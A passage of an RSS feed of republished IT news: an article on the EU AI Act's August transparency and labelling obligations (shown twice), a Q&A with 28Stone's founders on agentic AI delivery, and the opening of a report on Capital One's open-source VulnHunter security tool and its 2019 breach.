<p class="wp-block-paragraph">Providers that choose not to sign must comply through other methods and demonstrate that those methods are “adequate” through assessment by surveillance authorities, according to the Commission.</p>



<p class="wp-block-paragraph">Non-signatories “keep their flexibility, and will face more case-by-case scrutiny for it,” said Gogia.</p>



<h2 class="wp-block-heading">Criteria for compliance </h2>



<p class="wp-block-paragraph"><a href="https://www.infotech.com/profiles/shashi-bellamkonda" target="_blank" rel="noreferrer noopener">Shashi Bellamkonda</a>, principal research director at Info-Tech Research Group, pointed out that the transparency requirements apply to content only when three criteria are met: It has been published, is informative to the public, or is on matters of public interest.</p>



<p class="wp-block-paragraph">B2B business content or blogs may not need an AI disclosure if they do not meet these criteria, he noted. Also, published text that has undergone human review or is under editorial control does not need to be labeled. Editorial control means that a person must hold the ultimate legal responsibility for the publication of the content.</p>



<p class="wp-block-paragraph">Many companies like Google, Adobe, and LinkedIn have already established ways to identify images marked as AI-generated. Meta has made it a requirement, but the creator has to add the AI-generated label, Bellamkonda said.</p>



<p class="wp-block-paragraph">“This is a good move for <a href="https://www.computerworld.com/article/4164963/eu-lawmakers-fail-to-agree-on-watered-down-ai-act-talks-pushed-to-may.html" target="_blank">guardrails</a> around public information, and companies with good compliance and ethical oversight may not have to worry about this,” he noted. But as a general practice, companies should disclose AI-generated content and state whether it has been human reviewed.</p>



<h2 class="wp-block-heading">Creating a transparency pipeline</h2>



<p class="wp-block-paragraph">Establishing full transparency means identifying who carries the responsibility for the content, whether the marking survives real use, not just testing, and what evidence will defend the decision, Gogia said.</p>



<p class="wp-block-paragraph">Concerns cluster around responsibility, durability and evidence. Several organizations usually touch one piece of content, and none controls the whole chain, which is why contracts become the “pressure point,” he said. Most current agreements were written to deliver software and say “almost nothing” about provenance persistence, verification access, or evidence retention.</p>



<p class="wp-block-paragraph">The durability concern is the most difficult, Gogia noted, because marking performs well in controlled settings but “badly in ordinary life.” Meta, for one, said its invisible watermark was designed to survive cropping; a published test, however, found the company’s preview detector missed <a href="https://www.reuters.com/business/meta-ai-image-detector-fails-identify-some-its-own-cropped-ai-images-reuters-2026-07-10/" target="_blank" rel="noreferrer noopener">55% of cropped images</a>.</p>



<p class="wp-block-paragraph">“CIOs should ask which platform can actually provide evidence before believing its dashboard,” said Gogia.</p>



<p class="wp-block-paragraph">Disclosure of AI use must be “clear, distinguishable and accessible,” he emphasized. “A notice buried in lengthy terms, or reachable only through determined clicking, satisfies nobody, least of all a market surveillance authority.”</p>



<p class="wp-block-paragraph">Sustained compliance is a “living control” requiring a central record of systems, duties and evidence; testing taking place where the user meets the control rather than where the developer built it; and continuous supplier assurance. Enforcement will vary by country, so keep one common baseline with local overlays, Gogia said.</p>



<p class="wp-block-paragraph">His advice: Inventory every system that talks to people, generates content, or gauges sentiment; classify provider and deployer roles; place disclosures at first interaction; define substantive human review; keep the evidence.</p>



<p class="wp-block-paragraph">Marks and provenance signals should be tested after content undergoes cropping, compression, translation, transcription, and other editing, Gogia said. A useful audit starts from a real output and follows its “pulse” through generation, editing and publication, identifying at “each beat” the responsible party, the surviving mark, and evidence for exceptions. Missed labels should also be traced for root cause and recurrence.</p>



<p class="wp-block-paragraph">To ensure compliance, before August 2, enterprises need a prioritized inventory, live disclosures on the highest-risk use cases, and a “named owner for every control,” he noted. In the first 30 days, they should stabilize and test; in the first 90 days, push requirements into procurement processes as a standing discipline. Procurement must secure commitments on marking methods, known failure modes, and evidence access, with explicit notice if/when any of them change.</p>



<p class="wp-block-paragraph">“The sensible architecture is a common transparency baseline carrying traceability, responsibility, and evidence, with jurisdictional overlays for language, sector rules, and local practice,” Gogia said.</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.cio.com/article/4199109/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready.html" target="_blank">CIO.com</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The EU’s AI transparency deadline is weeks away. Is your enterprise ready?]]></title>
<description><![CDATA[Providers and deployers of AI systems: You only have a couple of weeks left until you must explicitly inform users when they are interacting with AI content.



To assist in the effort, the European Commission (Commission) has published guidelines to help AI deployers get in line with the AI Act’...]]></description>
<link>https://tsecurity.de/de/3682511/it-nachrichten/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682511/it-nachrichten/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready/</guid>
<pubDate>Tue, 21 Jul 2026 03:48:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Providers and deployers of AI systems: You only have a couple of weeks left until you must explicitly inform users when they are interacting with AI content.</p>



<p class="wp-block-paragraph">To assist in the effort, the European Commission (Commission) has published <a href="https://ec.europa.eu/commission/presscorner/detail/en/ip_26_1653" target="_blank" rel="noreferrer noopener">guidelines</a> to help AI deployers get in line with the AI Act’s transparency obligations, which will begin to go into effect on August 2.</p>



<p class="wp-block-paragraph">After that, companies providing AI systems must alert users when they are interacting with AI. They must also tell users when they have been exposed to deepfakes, “emotion recognition,” or biometric categorization systems, or when they are given AI-manipulated content in matters of “public interests without human review or editorial control.”</p>



<p class="wp-block-paragraph"><a href="https://commission.europa.eu/about/organisation/college-commissioners/henna-virkkunen_en" target="_blank" rel="noreferrer noopener">Henna Virkkunen</a>, the Commission’s executive VP for tech sovereignty, security and democracy, said in a statement, “with today’s guidelines, the Commission supports the smooth and effective application of the AI Act to make AI systems interacting with people such as chatbots and AI agents and AI content more transparent and trustworthy. These guidelines support providers and deployers in meeting their obligations under the AI Act, while helping citizens know when they are interacting with AI.”</p>



<p class="wp-block-paragraph">Systems must include machine-readable markers to reveal such content, to reduce “the risk of deception and manipulation” and build public trust in AI.</p>



<p class="wp-block-paragraph">“Generative systems have collapsed the cost of producing convincing content while the cost of judging it stands where it always stood,” said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research. This requirement is “an attempt to restore friction to that imbalance.”</p>



<p class="wp-block-paragraph">A company’s non-compliance could result in fines anywhere from €750K (about $856K) to €15M (about $17 million), or even up to 3% of its total worldwide annual revenue.</p>



<h2 class="wp-block-heading">Transparency requirements</h2>



<p class="wp-block-paragraph">The <a href="https://www.cio.com/article/2096040/what-it-leaders-need-to-know-about-the-eu-ai-act.html" target="_blank">EU AI Act’s</a> transparency requirements apply to “natural or legal persons,” public authorities, agencies, or other bodies that develop AI systems, or have them developed, and place them on the EU market or into use under their name or trademark. This means all companies, regardless of whether or not they are EU-based.</p>



<p class="wp-block-paragraph">“Systems placed on the European market, put into service there, or producing outputs used there are inside the field, wherever the developer sits,” Gogia noted.</p>



<p class="wp-block-paragraph">Applicable systems must be intended to interact directly with “natural persons”; these systems include AI-enabled chatbots or conversational agents, AI companions, or coding agents. However, AI-enabled tools like recommender systems, spam filters, authentication, search and retrieval, transcription, text and code auto-completion, or predictive maintenance do not fall under the rule.</p>



<p class="wp-block-paragraph">Specific outputs such as AI-generated text, images, video, and audio must contain a machine-readable mark. Deepfakes and public interest-related text created by AI without human review or control must be clearly labeled, however, deepfake content that is “artistic, creative, satirical, or fictional” is largely exempt.</p>



<p class="wp-block-paragraph">AI content must be marked with one of three labels: “AI,” “Fully AI-generated,” or “Partially AI-modified.” For instance, “Fully AI-generated” applies when news summaries, music, art, or videos have been created without any human oversight (apart from prompting), while “partially AI-modified” could mean a person’s face is swapped into an authentic photograph to create a deepfake.</p>



<p class="wp-block-paragraph">The three icons are publicly available for free use; enterprises can download zip files in <a href="https://ec.europa.eu/newsroom/dae/redirection/document/129547" target="_blank" rel="noreferrer noopener">PNG</a> and <a href="https://ec.europa.eu/newsroom/dae/redirection/document/129546" target="_blank" rel="noreferrer noopener">SVG</a> formats.</p>



<p class="wp-block-paragraph">Most of the <a href="https://www.cio.com/article/4032894/analysis-of-the-european-ai-regulation-one-year-after-its-entry-into-force.html" target="_blank">Act’s transparency rules</a> begin to go into effect on August 2. But AI systems placed on the market before then will have some leeway; they must be in compliance by December 2.</p>



<p class="wp-block-paragraph">However, a four-month allowance “on one obligation, for one population of systems, contingent on one procedural step, is not a strategy,” Gogia emphasized. Enterprises should plan to comply by August 2 and “treat any relief that arrives as margin.”</p>



<h2 class="wp-block-heading">A consistent code of practice</h2>



<p class="wp-block-paragraph">Along with the transparency guidelines, the Commission has introduced a <a href="https://digital-strategy.ec.europa.eu/en/policies/code-practice-ai-generated-content" target="_blank" rel="noreferrer noopener">code of practice</a> that essentially serves as a gesture of good faith. When signed, it can provide “legal certainty” and a “simple and practical” way to demonstrate compliance with the <a href="https://www.cio.com/article/4143748/top-global-and-us-ai-regulations-to-look-out-for.html" target="_blank">AI Act</a>, according to the Commission. Signatories can also collaborate through the ‘Signatory Taskforce,’ which will share practices and advance technologies around marking and labeling practices.</p>



<p class="wp-block-paragraph">Providers that choose not to sign must comply through other methods and demonstrate that those methods are “adequate” through assessment by surveillance authorities, according to the Commission.</p>



<p class="wp-block-paragraph">Non-signatories “keep their flexibility, and will face more case-by-case scrutiny for it,” said Gogia.</p>



<h2 class="wp-block-heading">Criteria for compliance </h2>



<p class="wp-block-paragraph"><a href="https://www.infotech.com/profiles/shashi-bellamkonda" target="_blank" rel="noreferrer noopener">Shashi Bellamkonda</a>, principal research director at Info-Tech Research Group, pointed out that the transparency requirements apply to content only when three criteria are met: It has been published, is informative to the public, or is on matters of public interest.</p>



<p class="wp-block-paragraph">B2B business content or blogs may not need an AI disclosure if they do not meet these criteria, he noted. Also, published text that has undergone human review or is under editorial control does not need to be labeled. Editorial control means that a person must hold the ultimate legal responsibility for the publication of the content.</p>



<p class="wp-block-paragraph">Many companies like Google, Adobe, and LinkedIn have already established ways to identify images marked as AI-generated. Meta has made it a requirement, but the creator has to add the AI-generated label, Bellamkonda said.</p>



<p class="wp-block-paragraph">“This is a good move for <a href="https://www.computerworld.com/article/4164963/eu-lawmakers-fail-to-agree-on-watered-down-ai-act-talks-pushed-to-may.html" target="_blank">guardrails</a> around public information, and companies with good compliance and ethical oversight may not have to worry about this,” he noted. But as a general practice, companies should disclose AI-generated content and state whether it has been human reviewed.</p>



<h2 class="wp-block-heading">Creating a transparency pipeline</h2>



<p class="wp-block-paragraph">Establishing full transparency means identifying who carries the responsibility for the content, whether the marking survives real use, not just testing, and what evidence will defend the decision, Gogia said.</p>



<p class="wp-block-paragraph">Concerns cluster around responsibility, durability and evidence. Several organizations usually touch one piece of content, and none controls the whole chain, which is why contracts become the “pressure point,” he said. Most current agreements were written to deliver software and say “almost nothing” about provenance persistence, verification access, or evidence retention.</p>



<p class="wp-block-paragraph">The durability concern is the most difficult, Gogia noted, because marking performs well in controlled settings but “badly in ordinary life.” Meta, for one, said its invisible watermark was designed to survive cropping; a published test, however, found the company’s preview detector missed <a href="https://www.reuters.com/business/meta-ai-image-detector-fails-identify-some-its-own-cropped-ai-images-reuters-2026-07-10/" target="_blank" rel="noreferrer noopener">55% of cropped images</a>.</p>



<p class="wp-block-paragraph">“CIOs should ask which platform can actually provide evidence before believing its dashboard,” said Gogia.</p>



<p class="wp-block-paragraph">Disclosure of AI use must be “clear, distinguishable and accessible,” he emphasized. “A notice buried in lengthy terms, or reachable only through determined clicking, satisfies nobody, least of all a market surveillance authority.”</p>



<p class="wp-block-paragraph">Sustained compliance is a “living control” requiring a central record of systems, duties and evidence; testing taking place where the user meets the control rather than where the developer built it; and continuous supplier assurance. Enforcement will vary by country, so keep one common baseline with local overlays, Gogia said.</p>



<p class="wp-block-paragraph">His advice: Inventory every system that talks to people, generates content, or gauges sentiment; classify provider and deployer roles; place disclosures at first interaction; define substantive human review; keep the evidence.</p>



<p class="wp-block-paragraph">Marks and provenance signals should be tested after content undergoes cropping, compression, translation, transcription, and other editing, Gogia said. A useful audit starts from a real output and follows its “pulse” through generation, editing and publication, identifying at “each beat” the responsible party, the surviving mark, and evidence for exceptions. Missed labels should also be traced for root cause and recurrence.</p>



<p class="wp-block-paragraph">To ensure compliance, before August 2, enterprises need a prioritized inventory, live disclosures on the highest-risk use cases, and a “named owner for every control,” he noted. In the first 30 days, they should stabilize and test; in the first 90 days, push requirements into procurement processes as a standing discipline. Procurement must secure commitments on marking methods, known failure modes, and evidence access, with explicit notice if/when any of them change.</p>



<p class="wp-block-paragraph">“The sensible architecture is a common transparency baseline carrying traceability, responsibility, and evidence, with jurisdictional overlays for language, sector rules, and local practice,” Gogia said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Q&A: Why boutique consultancies might be better for AI rollouts than the bigwigs]]></title>
<description><![CDATA[Major AI labs are unleashing forward-deployed engineers (FDEs) to try and grab enterprise customers. Large consultancies are dishing out tokens and assembling armies of consultants — both human and agent — to do the same.



But smaller firms are in the mix now, as well. AI is helping 28Stone Con...]]></description>
<link>https://tsecurity.de/de/3680996/it-nachrichten/qa-why-boutique-consultancies-might-be-better-for-ai-rollouts-than-the-bigwigs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680996/it-nachrichten/qa-why-boutique-consultancies-might-be-better-for-ai-rollouts-than-the-bigwigs/</guid>
<pubDate>Mon, 20 Jul 2026 13:33:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Major AI labs are <a href="https://www.computerworld.com/article/4171867/heres-one-career-emerging-from-the-ai-shift-forward-deployed-engineers.html">unleashing forward-deployed engineers</a> (FDEs) to try and grab enterprise customers. Large consultancies are dishing out tokens and assembling armies of consultants — both human and agent — to do the same.</p>



<p class="wp-block-paragraph">But smaller firms are in the mix now, as well. AI is helping <a href="https://www.28stone.com/" target="_blank" rel="noreferrer noopener">28Stone Consulting</a>, a New York-based, 230-person technology consultancy for capital markets, punch above its weight against larger rivals in the <a href="https://www.computerworld.com/article/4180088/ai-vendor-fdes-key-considerations-and-concerns.html">rush to deliver FDEs</a>.</p>



<p class="wp-block-paragraph">In this Q&amp;A, <a href="https://www.linkedin.com/in/thomas-dolan-4124914" target="_blank" rel="noreferrer noopener">Thomas Dolan</a> and <a href="https://www.linkedin.com/in/frank-erickson-07675a1" target="_blank" rel="noreferrer noopener">Frank Erickson</a>, founders of 28Stone, argue that agentic AI isn’t a one-size-fits-all solution in vertical markets; success takes discipline, deep domain expertise, and human involvement to mitigate risk.</p>



<p class="wp-block-paragraph">Many enterprises continue to struggle with the use of AI agents, which is consultancies are stepping in to get projects off the ground. 28Stone is among those that have published blueprints and methodologies on the development and delivery of agentic AI workflows with humans in the loop.</p>



<p class="wp-block-paragraph"><em>Computerworld</em> spoke with both founding partners about why companies are still stumbling with <a href="https://www.computerworld.com/article/4083589/from-chatbots-to-colleagues-how-agentic-ai-is-redefining-enterprise-automation.html">agentic AI rollouts</a>, and what a disciplined delivery process actually looks like.</p>



<p class="wp-block-paragraph"><strong>After 15 years of delivering software for capital markets firms, is ‘AI-first’ a real distinction or just positioning?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “We’re not shying away from being AI-forward. What needs to shine through is AI done intelligently — not stuff you get by buying some tokens for somebody on the trading desk. We’re an AI-first firm.”</p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “And it’s temporary. At some point, AI is going to be synonymous with software development.</p>



<p class="wp-block-paragraph">“The whole idea of an AI SDLC (software development lifecycle) versus an SDLC is going to be one and the same, a lot like cloud computing today. To not include AI in your strategy, you’d look like a COBOL vendor.”</p>



<p class="wp-block-paragraph"><strong>What does agentic AI delivery look like?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “We’ve got several AI initiatives delivering a pure agentic approach. We’ve doubled down on the human expertise wrapper in the SDLC. That doesn’t mean sacrificing any of the benefits of the AI models — quite the opposite.</p>



<p class="wp-block-paragraph">“You don’t achieve anywhere near the same level of value from applying AI without keeping that expertise — industry, functional and technical — throughout the process.”</p>



<p class="wp-block-paragraph"><strong>Where do humans stay in the loop once agents are doing the work?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “We’re believers in starting with requirements discovery. Someone who knows the analytical nuances of a good business analyst is critically important; shaping a product owner’s business information through a markup file that can be fed into a BA agent, then treating the output as if it came from a very fast junior BA. Only then is the story complete.</p>



<p class="wp-block-paragraph">“The developer takes that story, transforms it into the most efficient input, then owns the output, because they’re accountable for that code. A developer should own the code on both the input and output side.</p>



<p class="wp-block-paragraph">“Your product owner, who knows the business, that’s great. But expecting them to interact with an agent and output enterprise code is ridiculous. It’s not a great plan.“</p>



<p class="wp-block-paragraph"><strong>Why not just put one do-everything person in charge of AI and agents?</strong></p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “Every analyst, programmer or software engineer isn’t a great requirements analyst. And a great domain analyst with some technical background won’t know if the agent’s code is garbage, maintainable, performant.</p>



<p class="wp-block-paragraph">“It’s unrealistic to expect one individual to have that breadth across domain, software engineering, testing, deployment. Clients ask all the time, and we push back: ‘Great, if you can find that guy, they’re few and far between.’ To deliver at the enterprise level, you need the human expertise, at depth.“</p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “There’s system speed and latency, important in parts of finance. Then there’s speed of delivery, because other areas evolve quickly and time-to-market is critical.</p>



<p class="wp-block-paragraph">“Our human wrapper may at first pass come across as a little slowed down. Maybe it is. But [Erickson] has a good analogy about one of the dangers of AI: you can end up going really fast in the wrong direction. By the time you look up, you’re way off base and have to backtrack.“</p>



<p class="wp-block-paragraph"><strong>What about AI in your sector do you think is overhyped?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “The hype around the ease of use of AI and the democratization of enterprise software delivery — that ‘anybody could do it now, it’s all being done by machines’ — is another idea that could prove costly in the long run.</p>



<p class="wp-block-paragraph">“This do-it-yourself reaction is dangerous for clients, and for trust in the overall AI benefit, which is real. We compare it to the beginning of offshoring 20, 30 years ago: a golden idea that was going to cure everything. A lot of firms did it thoughtlessly, thinking it’s just labor arbitrage, and it almost inevitably failed. That all-or-nothing mentality missed that offshoring is an amazing way of getting better value for your dollar, but it has to be done thoughtfully, so the delivery process — the thing that ties it all together — stays unsevered.</p>



<p class="wp-block-paragraph">“We’re seeing that now. I’ve heard, ‘We’ll just push a button, the machine’s building the system.’ The machine is not building the system. It might be writing the code, the story, running the tests.</p>



<p class="wp-block-paragraph">The system is built by a team of engineers you bring in and trust. My fear is that people will say, ‘We don’t need this vendor or this technology team. I’ve got a product team. They might not be able to code at all, but they know the business,’ and it fails dramatically. </p>



<p class="wp-block-paragraph">“Then people say, ‘We played with AI, it’s not ready yet,’ and throw it all away. One of the best things we can do is ensure clients know the benefit is real.“</p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “The hype can be summed up in a single phrase: <a href="https://www.computerworld.com/article/4022711/when-everything-is-vibing.html">vibe coding</a>. That has done AI a massive disservice, because there’s a huge difference between vibe coding and enterprise software development, and some of the loudest proponents of AI are too latched on to it. In our industry, the only way to succeed would be a stable of unicorns. It just doesn’t scale. I get perturbed when our people internally refer to AI tooling as vibe coding; if they think that’s what they’re doing, they’re misunderstood.“</p>



<p class="wp-block-paragraph"><strong>When you engage clients at different levels of AI maturity, how do you get them to a understand what works?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “95% of our take on an agentic approach is in line with everyone else’s, but that 5% matters, especially in requirements discovery, in who’s giving the requirements and how they’re thought of. It can set you up for dramatic errors, given the speed at which you’re moving.</p>



<p class="wp-block-paragraph">“There’s a dangerous human tendency we’re seeing among clients to try and cut corners at the start of a project and — in lieu of having deep, expert driven discovery sessions — just summarize what they may want using AI.</p>



<p class="wp-block-paragraph">“We would hope our clients are collaborative, everyone understanding it’s early days. If a client insists on doing something we feel strongly against, like a product owner completely owning everything right up to code generation, that’s an issue we have to either push back strongly on or step out of the accountability for.“</p>



<p class="wp-block-paragraph"><strong>AI body shops — LLM providers and giant consultancies — are emerging to help enterprises deploy AI. Does that model work?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “Whether you’re partnering with an LLM or with an AI-first, generic software provider — ‘Hey, we’re not industry guys, but we know AI delivery’ — you end up, if you’re a bank or a broker-dealer, saying: ‘All right, we know our business, these guys know the AI side of it. What could go wrong? Put us together and we’ll have quality engineering.’</p>



<p class="wp-block-paragraph">“The problem is what you miss: the know-how of putting industry and technical expertise together and actually delivering financial services systems. The people working at the generic delivery firms, whether an AI-only firm or a body shop somewhere, don’t have that capability.“</p>



<p class="wp-block-paragraph"><strong>Does AI change the economics for smaller consultancies like yours competing against the big firms, and does it cut both ways?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “Over our 15 years pre-AI, there were two recurring reasons we’d lose a project. One: ‘We’d love to work with you guys, given your subject matter expertise, but the costs just aren’t there compared to my budgets. I’m being forced to go to a body shop or an [offshore] delivery center.’ The other side of that coin: ‘We love your capabilities, but you’re a firm of 230 people and I need 300, 400 people.’</p>



<p class="wp-block-paragraph">“AI changes the options for clients. You don’t have to sacrifice the niche vendor who knows your space just because you need a larger team or a cost target. AI levels the playing field and should allow smaller firms to compete with the larger, big-box generic firms, the Accentures of the world.“</p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “It redefines what scale means. You can look at velocity as a measure of your cost to deliver, not a rate card. Scale can’t be defined in terms of headcount anymore. It’s got to be defined in terms of output.</p>



<p class="wp-block-paragraph">“There’s a threat in it, too. If you’re an Accenture with hundreds of thousands of low-cost software engineers, how do you train all those people? I feel for them. But for us, a couple hundred people with a specific domain focus, it’s a huge opportunity.“</p>



<p class="wp-block-paragraph"><strong>How has the profile of the people you and others hire changed with this agentic process?</strong></p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “You’re still looking for people with strong engineering and design backgrounds, and communication skills, because they interact across the software development lifecycle more than in the past.</p>



<p class="wp-block-paragraph">“Many take too much joy in typing out perfect code. Sorry, I don’t need you writing for-loops and classes anymore. I need you reviewing them, understanding them, operating at a higher level. That’s a different kind of person: an engineer, not a programmer or a coder. On the [business analyst] side it’s similar: people took great pride in detailed user stories covering every path. Now it’s conversations, prompts, reviewing output — less doing, more interacting.</p>



<p class="wp-block-paragraph">“More than ever, they have to be interested in the domain. They can’t just be, ‘I want to learn everything there is to know about Java.’ That’s too narrow. They don’t have to be an expert; they have to be interested. In our case, capital markets is a specific niche. The biggest challenge is getting familiar with the tools — finding time, while delivering for customers, to ramp up and make the mistakes you need to without jeopardizing projects.“</p>



<p class="wp-block-paragraph"><strong>What about governance? Who’s keeping AI delivery and its costs under control?</strong></p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “This is evolving rapidly. People aren’t sure how to put governance around this. The most obvious is financial governance. People are starting to get hefty bills. One of our clients spent a million dollars on tokens over the last eight weeks alone. Sticker shock. The token-maxing policies are starting to show their flaws. It’s wild west still: learn on the fly, then figure out what needs to be governed.“</p>



<p class="wp-block-paragraph"><strong>Are CIOs actually opening their wallets? And when they do, what’s the smarter way to invest?</strong></p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “There’s still a lot of caution. Forecasts keep going down on how long something should take. So: ‘I could wait three months and maybe still get it delivered by the same date someone’s promising me now, but for half the price. I’m going to wait and see when equilibrium is met.’ We haven’t seen the wallets open up like crazy — it’s slow adoption.“</p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “One of our clients is looking at it from a productivity-boost perspective: instead of doing the same for less, I can do much more for the same. AI lets clients pull the trigger on things they wouldn’t have in the past — projects that might not have been approved pre-AI, where the costs have come down to a point that’s palatable with the business.“</p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “And that’s the story we’re hoping to hear more of. There isn’t a huge cost anymore to exploring a business opportunity. The time and money that would have gone to a return-on-investment study could be spent on a proof-of-concept with AI, and the project done a few weeks later. Maybe [there’s] a hint of things to come, where decisions start being made quicker. </p>



<p class="wp-block-paragraph">“There’s a little fear on our side, though: a lot of tiny little projects is tough for a consulting business.“</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Capital One releases VulnHunter, an open-source AI tool that finds software flaws before hackers do]]></title>
<description><![CDATA[Capital One on Thursday released VulnHunter, an open-source, agentic AI security tool that scans source code for exploitable vulnerabilities, maps out how an attacker would reach them, and proposes targeted fixes — all before a single line ships to production. The tool, built internally and now a...]]></description>
<link>https://tsecurity.de/de/3677035/it-nachrichten/capital-one-releases-vulnhunter-an-open-source-ai-tool-that-finds-software-flaws-before-hackers-do/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677035/it-nachrichten/capital-one-releases-vulnhunter-an-open-source-ai-tool-that-finds-software-flaws-before-hackers-do/</guid>
<pubDate>Fri, 17 Jul 2026 23:02:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://www.capitalone.com/">Capital One</a> on Thursday released <a href="https://github.com/capitalone/vulnhunter">VulnHunter</a>, an open-source, agentic AI security tool that scans source code for exploitable vulnerabilities, maps out how an attacker would reach them, and proposes targeted fixes — all before a single line ships to production. The tool, built internally and <a href="https://github.com/capitalone/vulnhunter">now available on GitHub</a> under an Apache 2.0 license, is one of the most ambitious attempts by a major financial institution to turn offensive AI capabilities into a public defensive resource.</p><p>The move marks a striking philosophical turn for a company still defined, in many boardrooms, by a <a href="https://www.capitalone.com/digital/facts2019/">2019 data breach</a> that compromised the personal information of roughly 106 million people across the United States and Canada and ultimately cost the bank an <a href="https://www.occ.gov/news-issuances/news-releases/2020/nr-occ-2020-101.html">$80 million federal fine</a>.</p><p>Capital One is not simply releasing another vulnerability scanner. VulnHunter introduces what the company calls an "<a href="https://github.com/capitalone/vulnhunter">attacker-first forward analysis</a>" — a workflow in which the tool begins at the points where a real adversary would enter a system, such as APIs, network messages, or file uploads, and reasons forward through the application's logic to determine whether an exploit path actually survives the code's existing defenses. Conventional scanners typically work in reverse, flagging a dangerous-looking code pattern and then searching backward for a hypothetical attacker. That approach, security practitioners widely acknowledge, buries engineering teams under avalanches of false positives.</p><p><a href="https://github.com/capitalone/vulnhunter">VulnHunter</a> attacks that problem head-on with a second innovation: a built-in "falsification engine" that tries to disprove its own findings before a developer ever sees them. After the tool surfaces a potential vulnerability, a structured reasoning workflow hunts for logical gaps, unsupported assumptions, and conditions that would prevent the attack from succeeding. Only findings the engine fails to rule out reach a human reviewer — and when they do, VulnHunter delivers not just an alert but a full explanation of the exploit path and a proposed code fix ready for engineering review.</p><p>The tool currently runs on Anthropic's <a href="https://www.anthropic.com/news/claude-opus-4-8">Claude Opus 4.8 model</a> inside a Claude Code environment, though Capital One says the framework has the potential to work across other foundation models and coding harnesses.</p><h2><b>The 2019 breach that reshaped how Capital One thinks about cybersecurity</b></h2><p>To understand why Capital One chose to open-source a tool this consequential, you have to understand the scar tissue.</p><p>On July 19, 2019, <a href="https://www.capitalone.com/digital/facts2019/">Capital One disclosed </a>that an outside individual — later identified as a former Amazon Web Services employee named Paige Thompson — had gained unauthorized access to names, addresses, self-reported income, Social Security numbers, and linked bank account numbers belonging to credit card customers and applicants. The breach, which Capital One says occurred on March 22 and 23, 2019, was discovered only after an external security researcher flagged a configuration vulnerability through the company's <a href="https://www.capitalone.com/digital/responsible-disclosure/">Responsible Disclosure Program</a> on July 17 of that year.</p><p>The damage was sweeping. Approximately <a href="https://www.npr.org/2019/07/30/746687015/100-million-people-in-the-u-s-affected-by-capital-one-data-breach">100 million people in the United States</a> and 6 million in Canada were affected. Roughly 140,000 Social Security numbers, about 80,000 linked bank account numbers, and approximately 1 million Canadian Social Insurance Numbers were compromised. The FBI arrested Thompson, and the government stated it believed the data had been recovered with no evidence of fraud. But the reputational and regulatory toll was enormous.</p><p>In August 2020, the Office of the Comptroller of the Currency <a href="https://www.occ.gov/news-issuances/news-releases/2020/nr-occ-2020-101.html">fined Capital One $80 million</a>, finding that the bank had failed to adequately identify and manage risks as it migrated significant technology operations to the cloud. As Reuters reported at the time, the OCC's consent order cited insufficient network security controls, inadequate data loss prevention measures, and a board that failed to hold management accountable when internal auditing surfaced problems. The OCC also ordered Capital One to overhaul its operations and submit new cybersecurity plans for regulatory review.</p><p>The incident became an industry case study in the dangers of moving fast with new technology. As <a href="https://cyberscoop.com/capital-one-hack-banking-security/">CyberScoop reported</a> in July 2019, a cybersecurity executive at a competing financial company observed that the breach "could be the result of trying too many new things and forcing them through." Capital One's own CEO, Richard D. Fairbank, acknowledged the gravity of the moment. "While I am grateful that the perpetrator has been caught, I am deeply sorry for what has happened," Fairbank said at the time. "I sincerely apologize for the understandable worry this incident must be causing those affected and I am committed to making it right."</p><h2><b>How Capital One rebuilt its security reputation through open-source investment</b></h2><p>What followed was not a retreat from technology but a doubling down — with security explicitly at the center.</p><p>Capital One had declared itself an "<a href="https://capitalonesoftware.com/blog/cloud-migration-journey">open-source first</a>" company in 2015 as part of a broader technology transformation that began over a decade ago. After the breach, the company accelerated its investments in software supply chain security, open-source governance, and AI-driven defense. In August 2022, Capital One joined the <a href="https://openssf.org/">Open Source Security Foundation</a> as a premier member, earning a seat on the organization's Governing Board. Chris Nims, then EVP of Cloud &amp; Productivity Engineering, framed the move as a natural extension of the company's operating philosophy. "As a highly-regulated company, we are seasoned in managing 